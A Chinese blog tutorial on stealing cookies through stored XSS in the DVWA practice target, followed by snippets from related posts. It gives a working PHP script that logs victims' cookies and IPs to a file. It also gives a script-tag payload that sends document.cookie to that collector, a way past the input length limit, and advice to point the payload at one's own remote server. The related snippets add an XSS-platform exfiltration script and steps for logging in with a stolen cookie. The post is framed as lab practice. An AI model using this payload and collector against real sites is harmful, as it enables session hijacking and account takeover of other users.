存储xss实现获取cookie(本地实战)

于 2024-02-28 12:17:37 发布
阅读量497 收藏 2
点赞数 9
文章标签: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80661529/article/details/136341767
版权

实战更能体验收获!!!

环境准备:

1.phpstudy

2.dvwa靶场

实战

首先我们在phpstudy指定的localhost网站目录下编写一个xss.php文件,内容如下:

<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?>

然后进入dvwa靶场(security=low),(stored xss)那关,留言写入如下payload。

payload:<script>document.write('<img src="http://127.0.0.1/xss.php?cookie='+document.cookie+'"width=0 height=0 border=0 />');</script>

但是此关卡有长度限制,简单直接前端改一下长度即可:

50改为1000

刷新一下网页

然后到我们写的xss.php文件的目录下,会有一个cookie.txt文件,上面就会记录cookie及其IP

留言

实战结束留言:如果你拥有自己的网站以及服务器,本地实战就在你自己的服务器上实战即可,不过此处的IP地址也要跟着变化,不变化其实也行,但是改了更有实战的感觉,在此祝你们学习顺利!!!

Yf3_te
关注
  • 9
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
xss获取cookie的方法
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-27 1732
xss获取cookie简单步骤如下: 1、在存在漏洞的论坛中发日志。 2、然后以管理远登陆,进入后页面会跳转,此时cookie就发送到你的服务器下的code.txt文件中了。 3、这是没有账户前的登陆界面。 4、打开firefox的Tamper Data插件,点击Start Tamper开始抓取信息,刷新登陆界面,然后会跳出对话框,点击Tamper按钮,在途中的cookie一栏中替换掉你抓取到的cookie,单击确定发送请求数据,xss获取cookie 5、替换cookie后不用输用户名密码
XSS获取COOKIE
04-20
XSS获取COOKIE
XSS平台偷取cookie使用+XSS漏洞
最新发布
NSQ0207的博客
07-24 2181
在线利用网站:复制代码输入复制的代码查看获取到的cookie二、xss触发方式(1)在标签外:(2)在标签内:使用事件型:(先用引号闭合,看看是否有过滤如果有使用大小写试验)在标签内不能使用标签,使用标签标签内资源类型是url使用伪协议。
XSS平台cookie获取
永远是少年
11-21 1095
今天继续给大家介绍渗透测试相关知识,本文主要内容是XSS平台cookie获取。 一、XSS攻击目的 二、XSS平台 三、XSS攻击获取cookie简介
xss获取cookie
kiihuang的博客
03-31 816
主要是借助存储xss漏洞,来进行攻击的,获取每个访问人的cookie
XSS平台获取cookie
qq_41048303的博客
02-19 3544
XSS平台获取cookie 1.环境介绍 靶场:pikachu XSS平台:BLUE-LOTUS 浏览器:火狐浏览器 2.流程介绍 登录XSS平台,创建获取cookie的脚本 var website = "http://网站地址"; (function() { (new Image()).src = website + '/?keepsession=1&location=' + escape((function() { try { return d
SpringBoot +esapi 实现防止xss攻击 实战代码
11-25
SpringBoot +esapi springSecurity 过滤器链集成 实现防止xss攻击 实战代码
XSS获取cookie和利用方式 (ASP版).txt
12-22
XSS获取cookie和利用方式简单方法
SpringBoot +esapi 实现防止xss攻击 实战代码,满满干货
06-08
SpringBoot +esapi 实现防止xss攻击 实战代码,真实有效
XSS高级实战教程
09-28
跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的...
XSS获取目标cookie,伪造身份获取目标权限
qq_57663276的博客
08-23 3078
未知攻,何来防。网络安全靶场学习:XSS(跨站脚本攻击),使用XSS伪造目标权限。
XSS的键盘记录和cookie获取
Williamanddog的博客
01-26 1439
跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混 淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意JavaScript代码,当用户浏览该页 面时,嵌入Web里面的JS代码会被执行,从而达到恶意攻击用户的目的。XSS攻击针对的是用户层面的 攻击。 在一个Web页面上,有一种很常见的功能是将用户输入的内容输出到页面上。但是如果这里输入的内容 。
【每天学习一点新知识】XSS如何绕过HttpOnly获取Cookie以及XSS与CORS漏洞利用
RexHa的博客
10-27 5062
Cors请求可分为两类,简单请求和非简单请求。所谓简单请求,就是请求方式为GET,POST,HEAD这三种之一,并且HTTP头不超出(Accept,Accept-Language,Content-Language,Lat-Event-ID,Content-Type)这几种字段。(Cross-origin resource sharing),是H5提供的一种机制,WEB应用程序可以通过在HTTP增加字段来告诉浏览器,哪些不同来源的服务器是有权访问本站资源的,当不同域的请求发生时,就出现了跨域的现象。
XSS平台的简单搭建和获取cookie
m0_65096687的博客
10-09 2390
XSS平台可以辅助安全测试人员对XSS相关的漏洞危害进行深入学习,了解XSS的危害重视XSS的危害,如果要说XSS可以做哪些事情,XSS可以做js能够做的所有事情。包括但不限于:窃取Cookie、后台增删改文章、钓鱼、利用XSS漏洞进行传播、修改网页代码、网站重定向、获取用户信息(如浏览器信息,IP地址等)等。选择蓝莲花XSS平台的原因很简单,因为网络上大多数XSS平台都是需要注册啊,绑定什么的。2.把下载好的蓝莲花解压在PHPstudy的WWW目录下,这里为我更名为XSS。只需要修改登录密码进行提交。
渗透测试-跨站脚本攻击xss获取cookie
lza20001103的博客
04-24 4686
渗透测试-跨站脚本攻击xss获取cookie
XSS跨站脚本攻击(基础详解)
cike_y
01-10 2132
一次xss的备忘本,xss攻击有很多操作我都还没学会带入真正的实战,等实战成功我会再总结一篇
利用xss漏洞窃取cookie登录
黑面狐
08-23 1万+
今天在测试自己产品的时候,发现有个地方输入框执行javascript脚本。 正好趁着这个机会给小伙伴们演示xss的危害。 首先在XSS平台上搭建一个测试项目。 我用的是http://xss.fbisb.com这个的免费平台 项目配置选择默认就可以了。 然后直接复制平台提供的代码到存在xss漏洞的地方 保存以后,我让另一个同事登录,并点击这个模块。 这是XSS
利用XSS获取cookie
热门推荐
littlecjx
11-04 2万+
如果web应用在用户输入的地方没有过滤特殊字符,比如<, >, ', ", <script>, javascript 等字符,而且在变量输出的地方没有使用安全的编码函数,比如PHP的htmlentities()和htmlspecialchars()函数,JavaScript中的escapeJavascript函数,这样的web应用极易出现XSS漏洞。XSS攻击的危害主要有盗取用户cookie、跳转到
dvwa存储xss获取cookie
06-06
DVWA存储XSS攻击可以通过注入恶意脚本来获取用户的cookie信息。攻击者可以在DVWA应用程序中的输入框中注入恶意脚本,当用户访问受影响的页面时,恶意脚本会被执行,将用户的cookie信息发送到攻击者的服务器上。攻击者可以利用这些cookie信息来进行身份验证和其他恶意活动。为了防止这种攻击,应该对输入进行过滤和验证,并使用安全的编码实践来编写应用程序。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值